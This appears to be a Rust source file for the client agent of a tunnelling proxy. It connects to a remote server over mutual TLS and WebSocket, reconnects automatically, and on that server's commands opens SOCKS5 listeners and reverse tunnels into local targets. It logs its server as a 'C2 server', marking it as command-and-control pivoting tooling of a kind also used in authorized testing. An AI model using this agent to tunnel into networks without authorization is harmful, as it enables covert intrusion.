1use crate::error::{ProxyError, Result};
2use crate::protocol::{
3 frame_tunnel_data, parse_tunnel_data, Command, CommandResponse, ControlMessage, WsTextMessage,
4};
5use crate::socks5::Socks5Listener;
6use crate::ws::{self, ChannelMap};
7use bytes::Bytes;
8use futures_util::{SinkExt, StreamExt};
9use rustls::pki_types::{CertificateDer, PrivatePkcs8KeyDer};
10use std::collections::HashMap;
11use std::sync::Arc;
12use tokio::io::{AsyncReadExt, AsyncWriteExt};
13use tokio::net::TcpStream;
14use tokio::sync::{mpsc, RwLock};
15use tokio_tungstenite::tungstenite::Message;
16use tracing::{info, warn};
17
18pub async fn run(
20 server_url: &str,
21 cert_pem_path: &str,
22 key_pem_path: &str,
23 ca_cert_pem_path: &str,
24) -> Result<()> {
25 let cert_pem = tokio::fs::read_to_string(cert_pem_path).await?;
27 let key_pem = tokio::fs::read_to_string(key_pem_path).await?;
28 let ca_pem = tokio::fs::read_to_string(ca_cert_pem_path).await?;
29
30 let client_cert_der = pem_to_cert_der(&cert_pem)?;
31 let client_key_der = pem_to_key_der(&key_pem)?;
32 let ca_cert_der = pem_to_cert_der(&ca_pem)?;
33
34 let tls_config = crate::tls::make_mtls_client_config(
35 client_cert_der,
36 client_key_der,
37 ca_cert_der,
38 )?;
39
40 let (host, port) = parse_wss_url(server_url)?;
42
43 let mut backoff = 1u64;
44 loop {
45 info!("Connecting to {server_url}...");
46 match connect_and_run(&host, port, server_url, tls_config.clone()).await {
47 Ok(()) => {
48 info!("Disconnected from server");
49 backoff = 1;
50 }
51 Err(e) => {
52 warn!("Connection error: {e}");
53 }
54 }
55
56 info!("Reconnecting in {backoff}s...");
57 tokio::time::sleep(std::time::Duration::from_secs(backoff)).await;
58 backoff = (backoff * 2).min(60);
59 }
60}
61
62async fn connect_and_run(
63 host: &str,
64 port: u16,
65 server_url: &str,
66 tls_config: Arc<rustls::ClientConfig>,
67) -> Result<()> {
68 let addr = format!("{host}:{port}");
69 let tcp = TcpStream::connect(&addr).await?;
70
71 let connector = tokio_rustls::TlsConnector::from(tls_config);
72 let server_name = rustls::pki_types::ServerName::try_from(host.to_string())
73 .map_err(|e| ProxyError::Other(e.to_string()))?;
74 let tls_stream = connector.connect(server_name, tcp).await?;
75
76 info!("TLS handshake complete, upgrading to WebSocket...");
77 let ws_stream = ws::connect_ws(tls_stream, server_url).await?;
78 let (mut ws_sink, mut ws_source) = ws_stream.split();
79
80 let channels = Arc::new(ChannelMap::new(1)); let tunnel_targets: Arc<RwLock<HashMap<u32, String>>> = Arc::new(RwLock::new(HashMap::new()));
82 let tunnel_handles: Arc<RwLock<HashMap<u32, tokio::task::AbortHandle>>> =
84 Arc::new(RwLock::new(HashMap::new()));
85 let (ws_tx, mut ws_rx) = mpsc::channel::<Message>(256);
86
87 info!("Connected to C2 server");
88
89 let writer_handle = tokio::spawn(async move {
91 while let Some(msg) = ws_rx.recv().await {
92 if ws_sink.send(msg).await.is_err() {
93 break;
94 }
95 }
96 });
97
98 while let Some(msg_result) = ws_source.next().await {
100 let msg = match msg_result {
101 Ok(m) => m,
102 Err(e) => {
103 warn!("WebSocket read error: {e}");
104 break;
105 }
106 };
107
108 match msg {
109 Message::Text(text) => {
110 match serde_json::from_str::<WsTextMessage>(&text) {
111 Ok(WsTextMessage::Command(cmd)) => {
112 handle_command(
113 cmd,
114 &channels,
115 &tunnel_targets,
116 &tunnel_handles,
117 ws_tx.clone(),
118 )
119 .await;
120 }
121 Ok(WsTextMessage::Control(ctrl)) => {
122 handle_client_control(
123 ctrl,
124 &channels,
125 &tunnel_targets,
126 ws_tx.clone(),
127 )
128 .await;
129 }
130 Ok(WsTextMessage::Response(_)) => {
131 warn!("Unexpected response from server");
132 }
133 Err(e) => {
134 warn!("Failed to parse message: {e}");
135 }
136 }
137 }
138 Message::Binary(data) => {
139 if let Some((channel_id, payload)) = parse_tunnel_data(&data) {
140 if !channels.send(channel_id, Bytes::copy_from_slice(payload)).await {
141 warn!("Data for unknown channel {channel_id}");
142 }
143 }
144 }
145 Message::Close(_) => break,
146 _ => {}
147 }
148 }
149
150 writer_handle.abort();
151
152 channels.close_all().await;
154
155 {
157 let mut handles = tunnel_handles.write().await;
158 for (tid, handle) in handles.drain() {
159 handle.abort();
160 info!("Aborted tunnel {tid} on disconnect");
161 }
162 }
163 tunnel_targets.write().await.clear();
164
165 Ok(())
166}
167
168async fn handle_command(
170 cmd: Command,
171 channels: &Arc<ChannelMap>,
172 tunnel_targets: &Arc<RwLock<HashMap<u32, String>>>,
173 tunnel_handles: &Arc<RwLock<HashMap<u32, tokio::task::AbortHandle>>>,
174 ws_tx: mpsc::Sender<Message>,
175) {
176 match cmd {
177 Command::Socks { tunnel_id, port } => {
178 let addr = format!("127.0.0.1:{port}");
179 info!("Starting SOCKS5 listener on {addr} (tunnel {tunnel_id})");
180
181 match Socks5Listener::bind(&addr, tunnel_id).await {
182 Ok(socks_listener) => {
183 send_response(
184 &ws_tx,
185 CommandResponse::SocksReady { tunnel_id },
186 )
187 .await;
188
189 let channels = channels.clone();
190 let ws_tx = ws_tx.clone();
191 let handle = tokio::spawn(async move {
192 socks_accept_loop(socks_listener, channels, ws_tx).await;
193 });
194 tunnel_handles
195 .write()
196 .await
197 .insert(tunnel_id, handle.abort_handle());
198 }
199 Err(e) => {
200 warn!("Failed to bind SOCKS5: {e}");
201 send_response(
202 &ws_tx,
203 CommandResponse::Error {
204 tunnel_id: Some(tunnel_id),
205 message: format!("Failed to bind: {e}"),
206 },
207 )
208 .await;
209 }
210 }
211 }
212 Command::ReverseTunnel {
213 tunnel_id,
214 remote_port,
215 local_target,
216 } => {
217 info!(
218 "Reverse tunnel {tunnel_id}: validating {local_target} \
219 (remote_port={remote_port})"
220 );
221
222 match tokio::time::timeout(
224 std::time::Duration::from_secs(5),
225 TcpStream::connect(&local_target),
226 )
227 .await
228 {
229 Ok(Ok(_tcp)) => {
230 tunnel_targets
232 .write()
233 .await
234 .insert(tunnel_id, local_target);
235 send_response(
236 &ws_tx,
237 CommandResponse::ReverseTunnelReady { tunnel_id },
238 )
239 .await;
240 }
241 Ok(Err(e)) => {
242 warn!("Reverse tunnel {tunnel_id}: target {local_target} unreachable: {e}");
243 send_response(
244 &ws_tx,
245 CommandResponse::Error {
246 tunnel_id: Some(tunnel_id),
247 message: format!("Target unreachable: {e}"),
248 },
249 )
250 .await;
251 }
252 Err(_) => {
253 warn!("Reverse tunnel {tunnel_id}: target {local_target} connect timed out");
254 send_response(
255 &ws_tx,
256 CommandResponse::Error {
257 tunnel_id: Some(tunnel_id),
258 message: "Target connect timed out".into(),
259 },
260 )
261 .await;
262 }
263 }
264 }
265 Command::Ping { seq } => {
266 send_response(&ws_tx, CommandResponse::Pong { seq }).await;
267 }
268 Command::StopTunnel { tunnel_id } => {
269 tunnel_targets.write().await.remove(&tunnel_id);
270 if let Some(handle) = tunnel_handles.write().await.remove(&tunnel_id) {
272 handle.abort();
273 }
274 let closed = channels.close_tunnel(tunnel_id).await;
276 if !closed.is_empty() {
277 info!("Closed {} active channels for tunnel {tunnel_id}", closed.len());
278 }
279 info!("Tunnel {tunnel_id} stopped");
280 send_response(
281 &ws_tx,
282 CommandResponse::Ok {
283 tunnel_id: Some(tunnel_id),
284 message: Some("Tunnel stopped".into()),
285 },
286 )
287 .await;
288 }
289 }
290}
291
292async fn handle_client_control(
294 ctrl: ControlMessage,
295 channels: &Arc<ChannelMap>,
296 tunnel_targets: &Arc<RwLock<HashMap<u32, String>>>,
297 ws_tx: mpsc::Sender<Message>,
298) {
299 match ctrl {
300 ControlMessage::ChannelOpen {
301 channel_id,
302 tunnel_id,
303 target: _,
304 } => {
305 if channel_id % 2 != 0 {
307 warn!("Rejected ChannelOpen with odd channel_id {channel_id} from server");
308 return;
309 }
310 if channels.has(channel_id).await {
311 warn!("Rejected ChannelOpen with duplicate channel_id {channel_id}");
312 let close = WsTextMessage::Control(ControlMessage::ChannelClose { channel_id });
313 if let Ok(json) = serde_json::to_string(&close) {
314 let _ = ws_tx.send(Message::Text(json)).await;
315 }
316 return;
317 }
318
319 let targets = tunnel_targets.read().await;
321 let local_target = match targets.get(&tunnel_id) {
322 Some(t) => t.clone(),
323 None => {
324 warn!("ChannelOpen for unknown tunnel {tunnel_id}");
325 return;
326 }
327 };
328 drop(targets);
329
330 info!("Reverse channel {channel_id} -> connecting to {local_target}");
331
332 let (data_tx, data_rx) = mpsc::channel::<Bytes>(256);
334 channels.insert_with_tunnel(channel_id, tunnel_id, data_tx).await;
335
336 let channels = channels.clone();
337 tokio::spawn(async move {
338 let connect_result = tokio::time::timeout(
340 std::time::Duration::from_secs(8),
341 TcpStream::connect(&local_target),
342 )
343 .await;
344 match connect_result {
345 Ok(Ok(tcp)) => {
346 if !channels.has(channel_id).await {
348 warn!("Channel {channel_id} revoked during reverse connect, dropping");
349 drop(tcp);
350 return;
351 }
352
353 let ready = WsTextMessage::Control(ControlMessage::ChannelReady {
354 channel_id,
355 });
356 if let Ok(json) = serde_json::to_string(&ready) {
357 let _ = ws_tx.send(Message::Text(json)).await;
358 }
359
360 relay_tcp_ws(tcp, channel_id, data_rx, channels, ws_tx).await;
361 }
362 Ok(Err(e)) => {
363 warn!("Failed to connect to {local_target}: {e}");
364 channels.remove(channel_id).await;
365 let close = WsTextMessage::Control(ControlMessage::ChannelClose {
366 channel_id,
367 });
368 if let Ok(json) = serde_json::to_string(&close) {
369 let _ = ws_tx.send(Message::Text(json)).await;
370 }
371 }
372 Err(_) => {
373 warn!("Connect to {local_target} timed out for channel {channel_id}");
374 channels.remove(channel_id).await;
375 let close = WsTextMessage::Control(ControlMessage::ChannelClose {
376 channel_id,
377 });
378 if let Ok(json) = serde_json::to_string(&close) {
379 let _ = ws_tx.send(Message::Text(json)).await;
380 }
381 }
382 }
383 });
384 }
385 ControlMessage::ChannelReady { channel_id } => {
386 channels.signal_ready(channel_id).await;
387 info!("Channel {channel_id} ready");
388 }
389 ControlMessage::ChannelClose { channel_id } => {
390 channels.remove(channel_id).await;
391 info!("Channel {channel_id} closed by server");
392 }
393 }
394}
395
396async fn socks_accept_loop(
399 listener: Socks5Listener,
400 channels: Arc<ChannelMap>,
401 ws_tx: mpsc::Sender<Message>,
402) {
403 let tunnel_id = listener.tunnel_id;
404 loop {
405 match listener.accept_raw().await {
406 Ok(raw_stream) => {
407 let channels = channels.clone();
408 let ws_tx = ws_tx.clone();
409 tokio::spawn(async move {
410 handle_socks_connection(raw_stream, tunnel_id, channels, ws_tx).await;
411 });
412 }
413 Err(e) => {
414 warn!("SOCKS5 accept error: {e}");
415 }
416 }
417 }
418}
419
420async fn handle_socks_connection(
422 raw_stream: TcpStream,
423 tunnel_id: u32,
424 channels: Arc<ChannelMap>,
425 ws_tx: mpsc::Sender<Message>,
426) {
427 let handshake = tokio::time::timeout(
429 std::time::Duration::from_secs(5),
430 crate::socks5::socks5_handshake(raw_stream),
431 )
432 .await;
433 let (mut tcp_stream, req) = match handshake {
434 Ok(Ok(result)) => result,
435 Ok(Err(e)) => {
436 warn!("SOCKS5 handshake failed: {e}");
437 return;
438 }
439 Err(_) => {
440 warn!("SOCKS5 handshake timed out");
441 return;
442 }
443 };
444
445 let channel_id = channels.alloc_id();
446 info!(
447 "SOCKS5 connection -> {}, channel {channel_id}",
448 req.target_addr
449 );
450
451 let (data_tx, data_rx) = mpsc::channel::<Bytes>(256);
452 channels
453 .insert_with_tunnel(channel_id, tunnel_id, data_tx)
454 .await;
455
456 let ready_rx = channels.wait_ready(channel_id).await;
457
458 let open = WsTextMessage::Control(ControlMessage::ChannelOpen {
459 channel_id,
460 tunnel_id,
461 target: Some(req.target_addr),
462 });
463 if let Ok(json) = serde_json::to_string(&open) {
464 if ws_tx.send(Message::Text(json)).await.is_err() {
465 channels.remove(channel_id).await;
466 return;
467 }
468 }
469
470 let ready_result = tokio::time::timeout(
472 std::time::Duration::from_secs(10),
473 ready_rx,
474 )
475 .await;
476 if ready_result.is_err() || ready_result.unwrap().is_err() {
477 warn!("Channel {channel_id} ready timeout or signal dropped");
478 channels.remove(channel_id).await;
479 let close = WsTextMessage::Control(ControlMessage::ChannelClose { channel_id });
480 if let Ok(json) = serde_json::to_string(&close) {
481 let _ = ws_tx.send(Message::Text(json)).await;
482 }
483 return;
484 }
485
486 if crate::socks5::send_socks5_success(&mut tcp_stream)
487 .await
488 .is_err()
489 {
490 warn!("Failed to send SOCKS5 success for channel {channel_id}");
491 channels.remove(channel_id).await;
492 let close = WsTextMessage::Control(ControlMessage::ChannelClose { channel_id });
493 if let Ok(json) = serde_json::to_string(&close) {
494 let _ = ws_tx.send(Message::Text(json)).await;
495 }
496 return;
497 }
498
499 relay_tcp_ws(tcp_stream, channel_id, data_rx, channels, ws_tx).await;
500}
501
502async fn relay_tcp_ws(
505 tcp: TcpStream,
506 channel_id: u32,
507 mut data_rx: mpsc::Receiver<Bytes>,
508 channels: Arc<ChannelMap>,
509 ws_tx: mpsc::Sender<Message>,
510) {
511 let (mut tcp_read, mut tcp_write) = tcp.into_split();
512
513 let ws2tcp = tokio::spawn(async move {
515 while let Some(data) = data_rx.recv().await {
516 if tcp_write.write_all(&data).await.is_err() {
517 break;
518 }
519 }
520 let _ = tcp_write.shutdown().await;
521 });
522
523 let ws_tx_data = ws_tx.clone();
525 let tcp2ws = tokio::spawn(async move {
526 let mut buf = vec![0u8; 8192];
527 loop {
528 match tcp_read.read(&mut buf).await {
529 Ok(0) | Err(_) => break,
530 Ok(n) => {
531 let frame = frame_tunnel_data(channel_id, &buf[..n]);
532 if ws_tx_data.send(Message::Binary(frame)).await.is_err() {
533 break;
534 }
535 }
536 }
537 }
538 });
539
540 let ws2tcp_abort = ws2tcp.abort_handle();
543 let tcp2ws_abort = tcp2ws.abort_handle();
544
545 tokio::select! {
546 _ = ws2tcp => {}
547 _ = tcp2ws => {}
548 }
549
550 let close = WsTextMessage::Control(ControlMessage::ChannelClose { channel_id });
552 if let Ok(json) = serde_json::to_string(&close) {
553 let _ = ws_tx.send(Message::Text(json)).await;
554 }
555
556 tokio::time::sleep(std::time::Duration::from_secs(5)).await;
558
559 channels.remove(channel_id).await;
561 ws2tcp_abort.abort();
562 tcp2ws_abort.abort();
563}
564
565async fn send_response(ws_tx: &mpsc::Sender<Message>, resp: CommandResponse) {
566 let msg = WsTextMessage::Response(resp);
567 if let Ok(json) = serde_json::to_string(&msg) {
568 let _ = ws_tx.send(Message::Text(json)).await;
569 }
570}
571
572fn parse_wss_url(url: &str) -> Result<(String, u16)> {
573 let stripped = url
574 .strip_prefix("wss://")
575 .ok_or_else(|| ProxyError::Other("Server URL must start with wss://".into()))?;
576 let (host, port) = if let Some((h, p)) = stripped.rsplit_once(':') {
577 let port: u16 = p
578 .parse()
579 .map_err(|_| ProxyError::Other(format!("Invalid port in URL: {p}")))?;
580 (h.to_string(), port)
581 } else {
582 (stripped.to_string(), 443)
583 };
584 Ok((host, port))
585}
586
587fn pem_to_cert_der(pem: &str) -> Result<CertificateDer<'static>> {
588 let mut reader = std::io::BufReader::new(pem.as_bytes());
589 let certs = rustls_pemfile::certs(&mut reader)
590 .collect::<std::result::Result<Vec<_>, _>>()?;
591 certs
592 .into_iter()
593 .next()
594 .ok_or_else(|| ProxyError::Other("No certificate found in PEM".into()))
595}
596
597fn pem_to_key_der(pem: &str) -> Result<PrivatePkcs8KeyDer<'static>> {
598 let mut reader = std::io::BufReader::new(pem.as_bytes());
599 let keys = rustls_pemfile::pkcs8_private_keys(&mut reader)
600 .collect::<std::result::Result<Vec<_>, _>>()?;
601 keys.into_iter()
602 .next()
603 .ok_or_else(|| ProxyError::Other("No PKCS8 private key found in PEM".into()))
604}